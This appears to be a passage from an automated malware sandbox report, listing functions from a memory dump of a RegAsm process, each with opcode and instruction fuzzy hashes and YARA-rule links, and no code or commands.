                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c7669e51c94a5076f96e7ee0a75ce72702c97e7364ef81ae6a5c5b6f9c1536aa
                                                                                          • Instruction ID: 34450684220bcf290efb012d8fd9c333b68c7406a381d4ee238498d07cf5dadd
                                                                                          • Opcode Fuzzy Hash: c7669e51c94a5076f96e7ee0a75ce72702c97e7364ef81ae6a5c5b6f9c1536aa
                                                                                          • Instruction Fuzzy Hash: 2D11023A254744AFCB25CF5BD840F57B7A9EB8E764F054219FA048B240CB70E850CFA0
                                                                                          Function 032AD6F0 Relevance: .1, Instructions: 57COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ab5dca7662d95f66bb5cdf7901944074af6dd6205da9398680eb86638002d29b
                                                                                          • Instruction ID: 3f360eeeb0297828e0e3ed4f8e950562bdb8ea20a6e21fdfb93f5242ecac1610
                                                                                          • Opcode Fuzzy Hash: ab5dca7662d95f66bb5cdf7901944074af6dd6205da9398680eb86638002d29b
                                                                                          • Instruction Fuzzy Hash: 8F01657A710609FB9B08DBAACE54DAFBBBDEF85B44F050059A905D7100E774EE81C760
                                                                                          Function 03226620 Relevance: .1, Instructions: 56COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 905a610a8498f4c4dde9121fd8246570df687cda8dd8e15e50b18a74c7352481
                                                                                          • Instruction ID: 800f403a4a658cf0dd21b3a0f681b1b25496d654fc9590667c9e9cf4fddccdc3
                                                                                          • Opcode Fuzzy Hash: 905a610a8498f4c4dde9121fd8246570df687cda8dd8e15e50b18a74c7352481
                                                                                          • Instruction Fuzzy Hash: D411E577A10726BBCB21DF59CD80B6EFBB9EF48740F540054DA00AB200D7B8AD858B90
                                                                                          Function 031E7330 Relevance: .1, Instructions: 55COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d52826a502792af56b374001ce2b49069f7924995a3fa60af9b3a07c11f4d2c7
                                                                                          • Instruction ID: d8dc99e11fc9eb0a0da2ac745919a7749ae75828413f935d57e06c70748f5f63
                                                                                          • Opcode Fuzzy Hash: d52826a502792af56b374001ce2b49069f7924995a3fa60af9b3a07c11f4d2c7
                                                                                          • Instruction Fuzzy Hash: E511A071610B049FE725CF55C841B6BB7E8EB48304F054429E986CB250D776EC408BB0
                                                                                          Function 0321F2D0 Relevance: .1, Instructions: 54COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0d8ba49c7745b88c703ab91bec920db41494157e1c17d2d2ee608c7fd967f41d
                                                                                          • Instruction ID: 5e576244d515684e81be4441ac15dfabc2d663bc144010de8e5ff0b724985967
                                                                                          • Opcode Fuzzy Hash: 0d8ba49c7745b88c703ab91bec920db41494157e1c17d2d2ee608c7fd967f41d
                                                                                          • Instruction Fuzzy Hash: 49110875620749AFC720DF69C944BAEB7F8FF45700F1840B6E501EB681D6B9D981C750
                                                                                          Function 032872A0 Relevance: .1, Instructions: 53COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
                                                                                          • Instruction ID: b432edfb45e508bd14315063e9d16e030f98a669acee609462af3b4c80a7724c
                                                                                          • Opcode Fuzzy Hash: 1e850f2c6b8a62aa57273bc2e4efeca7cc81b0ea7f022921ea7aa6f1d3ab38ae
                                                                                          • Instruction Fuzzy Hash: D801D27A250606FFD711EF15CC80E52F76EFF94390B540925F200465A0C771ACE0CAA0
                                                                                          Function 031EA250 Relevance: .1, Instructions: 52COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                          • Instruction ID: d43c584368dc52a4af84d9a5fc331b8d4190967060335990560e8bed3ef44f6b
                                                                                          • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                                          • Instruction Fuzzy Hash: 92012272404B129BCB34CF55D840A32BBA8EF4DB607048A6DFC95AF280C332D820CBA0
                                                                                          Function 031F6259 Relevance: .1, Instructions: 51COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 387daa25eca082dfdadc6deb7c3a5bc2b5e86557c0959d09192b33b77ea5f359
                                                                                          • Instruction ID: 53ab5fcba85a433c6efc3e97a506ef545ce43ce8c807b9efe25ed29d01257f8d
                                                                                          • Opcode Fuzzy Hash: 387daa25eca082dfdadc6deb7c3a5bc2b5e86557c0959d09192b33b77ea5f359
                                                                                          • Instruction Fuzzy Hash: 0E117CB5651328ABDB25EB64CD42FE9B379AF08710F5045D4A318AA1E0DBB09EC1CF84
                                                                                          Function 031F208A Relevance: .0, Instructions: 50COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                          • Instruction ID: e2a18046b1ec40dc1190e771661b36d903b79f3773d730598c12b412f7825eaf
                                                                                          • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                          • Instruction Fuzzy Hash: B201283B6102109FDF19DA59D980BA6B76ABFC8700F5A49A5EE018F245DBB1C8C2C790
                                                                                          Function 031EC020 Relevance: .0, Instructions: 49COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                          • Instruction ID: 3f8e22f2b492e34154b9be1f0a671f82ac0692ccfdfaaefde4af0f85d6b1f5c4
                                                                                          • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                          • Instruction Fuzzy Hash: 2D01F536110B459FDB36D766C800AA7B7E9FFD4710F098819E5468B540DEB1E481C790
                                                                                          Function 032320F0 Relevance: .0, Instructions: 49COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1db453ae1527a4275c11ed30f44b4a9dee50abed5c7b3aa2b586c0d7838ebaaf
                                                                                          • Instruction ID: b3103365c2d9e89e8908878a4a7eee27b81c5b789fee8d614c0527ecaa512021
                                                                                          • Opcode Fuzzy Hash: 1db453ae1527a4275c11ed30f44b4a9dee50abed5c7b3aa2b586c0d7838ebaaf
                                                                                          • Instruction Fuzzy Hash: D4116DB5A1020DEBCB04EF64D951FAE7BB9FF45640F004099E9019B290D675EE91CB90
                                                                                          Function 031E9353 Relevance: .0, Instructions: 48COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
                                                                                          • Instruction ID: d2754c14d9569b1f312f8ecf02d3cc8ed2865e44d66104ee2e6fd640e11747bc
                                                                                          • Opcode Fuzzy Hash: 16eb1e9227c9ca53ee971aeba792c6b4be561f846bb8a1c766c052503132072f
                                                                                          • Instruction Fuzzy Hash: 9D116D72910F02DFD731DF25C880B22B3E5BF48766F19886DD4994E5A6C37AE881CB50
                                                                                          Function 032133A5 Relevance: .0, Instructions: 47COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
                                                                                          • Instruction ID: e87deee60e73a9f33ec5e93684f4e3e0862bc1ccb8f5b5cba6a884c00f73cda5
                                                                                          • Opcode Fuzzy Hash: 5807426d3854de8340053ba828383e613f6f2126caef2cc0c9319ce74fae2529
                                                                                          • Instruction Fuzzy Hash: 8401D63B710215E7CB12DA9ACE00E9BBAEE9F94640B150429BA05D7160EA70D9A1D760
                                                                                          Function 0322D1D0 Relevance: .0, Instructions: 47COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                                                          • Instruction ID: 6cdd87c43a64f68cb9e2099b34b52c8f31e3a471b21086ceb522f735ca57f6fa
                                                                                          • Opcode Fuzzy Hash: 2103513d2fbd223765d54b27d59d1ce24549dd4e977acd5ce3c70b0a80ca45ab
                                                                                          • Instruction Fuzzy Hash: B5014776A30254ABD711DA54EC04F6577A9EB84620F14435AFE318F282CBF4D8C1C791
                                                                                          Function 031E826B Relevance: .0, Instructions: 46COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 62b66ea580275f77bb393c21d2ec280ca6ccba7d83b0ac7f94f9efc0d7a53892
                                                                                          • Instruction ID: e0055417b391e88f1b8d71049186d46fb37f93c9bae7c600da35bc845f661787
                                                                                          • Opcode Fuzzy Hash: 62b66ea580275f77bb393c21d2ec280ca6ccba7d83b0ac7f94f9efc0d7a53892
                                                                                          • Instruction Fuzzy Hash: 9401F735720A09DBC708EB66D8059AFF3A9EF8CA10B094069D901AB644DF70EC41C290
                                                                                          Function 0320E016 Relevance: .0, Instructions: 46COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                          • Instruction ID: 490eaba250174bed665c78a7aa294ade0d9a2d79050a4552eadda9dd87a4ce6d
                                                                                          • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                          • Instruction Fuzzy Hash: 35015AB2224A819FD326C61DCA48F26BBDDEF45750F0E08A1E905DB6E2D768DCC4C625
                                                                                          Function 032AF367 Relevance: .0, Instructions: 45COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4443c8a253fe07d4037130d6f6f29fcf7e6b596a3a7f70843667529ca644f921
                                                                                          • Instruction ID: d651c88730a530c950467b421587e6a41d8038659f5bcbefc8e13cbe36455ae1
                                                                                          • Opcode Fuzzy Hash: 4443c8a253fe07d4037130d6f6f29fcf7e6b596a3a7f70843667529ca644f921
                                                                                          • Instruction Fuzzy Hash: 62018F75A20358ABDB10EBA9D905FAFBBB8EF44700F044066B500EF280D6B8DA41C794
                                                                                          Function 0321BBA0 Relevance: .0, Instructions: 45COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a24f52cdb8288cb79fc50fb6bee831d4ad8badaeb1e95628220fc13d97c47883
                                                                                          • Instruction ID: 66208800aaef1dbb4c97edb2c9c7699359e154a3c03a441cc913e04b1e992fc7
                                                                                          • Opcode Fuzzy Hash: a24f52cdb8288cb79fc50fb6bee831d4ad8badaeb1e95628220fc13d97c47883
                                                                                          • Instruction Fuzzy Hash: 4D019E77910129DBCB28CF08C690BA9B3F9AF54310F1800B9DC06A7340DB75AE50CA94
                                                                                          Function 032B972B Relevance: .0, Instructions: 44COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                                                                          • Instruction ID: e55596d33dfde9271844e2881c656f44701300612e66d90dcfe3f6a49795b747
                                                                                          • Opcode Fuzzy Hash: 12d69b80bc09a443baffa0cc5cbca6f8f88db38978ae6a908cdca1f93a55da69
                                                                                          • Instruction Fuzzy Hash: 2111A5B1A106219FDB88CF2DC0C0651BBE8FB88350B0582AAED18CB74AD374E915CF94
                                                                                          Function 032C5636 Relevance: .0, Instructions: 44COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 11f79ac2699a2d9d320c7cbe0bc82dc0dc3c67eba8d5021375ae969e0abdb838
                                                                                          • Instruction ID: 89ec0325827b351bd57c3e7f5ce58882f9ee7de7616c28bee14feb0669339b95
                                                                                          • Opcode Fuzzy Hash: 11f79ac2699a2d9d320c7cbe0bc82dc0dc3c67eba8d5021375ae969e0abdb838
                                                                                          • Instruction Fuzzy Hash: 21116D78D20259EBCB04EFA9D445A9EB7B4EF18304F24845AE914EB381D674EA42CB54
                                                                                          Function 031EC310 Relevance: .0, Instructions: 43COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                          • Instruction ID: 942cec404faf08cb3105f38fee28b285ae98adef22b1aedf7a91dd2483bf0801
                                                                                          • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                          • Instruction Fuzzy Hash: F8F0F637244F329BD736D6594C80B2BE6999FD9BA4F1A0035E209DF244CB628C0296D1
                                                                                          Function 032C5152 Relevance: .0, Instructions: 43COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c97a69c969aa0e28d504a0f2690ea8b07796fad4afb61f42db9ad6f77de61288
                                                                                          • Instruction ID: 91afa0a74a8f9817f4efd415253df32008f4c496ca80ea71c099cbd0821eb696
                                                                                          • Opcode Fuzzy Hash: c97a69c969aa0e28d504a0f2690ea8b07796fad4afb61f42db9ad6f77de61288
                                                                                          • Instruction Fuzzy Hash: 0A0121B5A202499BDB00DF69D9459DEB7B8FF49714F10405AF500EB340D674EA418BA4
                                                                                          Function 032C5060 Relevance: .0, Instructions: 43COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d15744679222e919c4208ade6fd2e5bbf0d64b0753c2ab57b18167d93a7a0d89
                                                                                          • Instruction ID: 14afb65ef24b839116eceda36b736b20e3773eeccf363f7024bfe912c14c2b6a
                                                                                          • Opcode Fuzzy Hash: d15744679222e919c4208ade6fd2e5bbf0d64b0753c2ab57b18167d93a7a0d89
                                                                                          • Instruction Fuzzy Hash: 600121B5A203599BCB04DF69D9419EEB7B8EF49304F10405AF501EB341D674EA418BA4
                                                                                          Function 0321C073 Relevance: .0, Instructions: 43COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                          • Instruction ID: f54e446a2e2141e12deb10b8d170e6abf886ae1c1956a20f38ab26f1b92dd7cc
                                                                                          • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                          • Instruction Fuzzy Hash: 5CF0C2B6600A25ABD324CF4DDD40E67F7EADBD1A80F088168A545CB220EA71DD44CB90
                                                                                          Function 032C50D9 Relevance: .0, Instructions: 43COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9e35042f7e5ef7679b804bb06107b8d0ac35000d01318db14744e2e7791971c7
                                                                                          • Instruction ID: ede5b1239c9e402b098804240c0afe027c75c4c2b8d4fbad5a143eaa39a9a4c3
                                                                                          • Opcode Fuzzy Hash: 9e35042f7e5ef7679b804bb06107b8d0ac35000d01318db14744e2e7791971c7
                                                                                          • Instruction Fuzzy Hash: 060121B5A20349ABCB00DF69D9459DEB7B8EF49704F50405AE500FB381D6B4E9418BA4
                                                                                          Function 03225734 Relevance: .0, Instructions: 43COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                                                          • Instruction ID: 1b38af0adc495d85b6ca6452d176f830b556dccf42fd11f5e854dba020afd99c
                                                                                          • Opcode Fuzzy Hash: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                                                          • Instruction Fuzzy Hash: DCF04F32A11625BFE308CF0CCC40F6AFBECEB06240F188069D500CB230E270DE04CA94
                                                                                          Function 032AF78A Relevance: .0, Instructions: 42COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0a4345c782bd4c700b426de05d61ffd6e02a764d5e3b8fd41ba8a234dc0afe86
                                                                                          • Instruction ID: c3a4ee82600756b2218021d94f023870dc2cdae0d6e6781d02ee719c3865d0b2
                                                                                          • Opcode Fuzzy Hash: 0a4345c782bd4c700b426de05d61ffd6e02a764d5e3b8fd41ba8a234dc0afe86
                                                                                          • Instruction Fuzzy Hash: D10100B4E1074AAFCB04DFA9D945A9EB7F4EF08304F108055E955EB341E674DA40CB51
                                                                                          Function 032AF2F8 Relevance: .0, Instructions: 41COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: db654bc262155bb7dac2b2c533b0ee83d80a9da8aecfabdda4b21503de862a29
                                                                                          • Instruction ID: 14a8e97d0f53e617cf1f0b70684fcd5a269d4ce80064003caf5498fd5475599d
                                                                                          • Opcode Fuzzy Hash: db654bc262155bb7dac2b2c533b0ee83d80a9da8aecfabdda4b21503de862a29
                                                                                          • Instruction Fuzzy Hash: F3F0C876B20748ABD704EFB9D905AEEB7B8EF44710F008056E511EB280DAB4DA018750
                                                                                          Function 032C61E5 Relevance: .0, Instructions: 41COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ce47ac9ba1503b19d3afd675a8e8c5cfe2957b55c2d7b7a6ed375ba9fa7c9fb3
                                                                                          • Instruction ID: c7ccdfc4b5caad9a95a128a0e9eb58f92f202ba52542a78b6fe0d6cdcef86709
                                                                                          • Opcode Fuzzy Hash: ce47ac9ba1503b19d3afd675a8e8c5cfe2957b55c2d7b7a6ed375ba9fa7c9fb3
                                                                                          • Instruction Fuzzy Hash: ED018F71A202499BCB00DFA9D445AEEB7B8AF48310F18406AE504AB280D778EA41CB95
                                                                                          Function 0322724D Relevance: .0, Instructions: 40COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_31c0000_RegAsm.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                                                                          • Instruction ID: f41deeb2bdec2d055f249fae97de78415a7e3522a9c4e29b5a992fc833cf923e
                                                                                          • Opcode Fuzzy Hash: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                                                                          • Instruction Fuzzy Hash: 5EF0FC75A35366BFEB10D75D8D40FABBFA89F84610F088655FD019B141D674D9C0C750
                                                                                          Function 032C53FC Relevance: .0, Instructions: 39COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2491783383.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
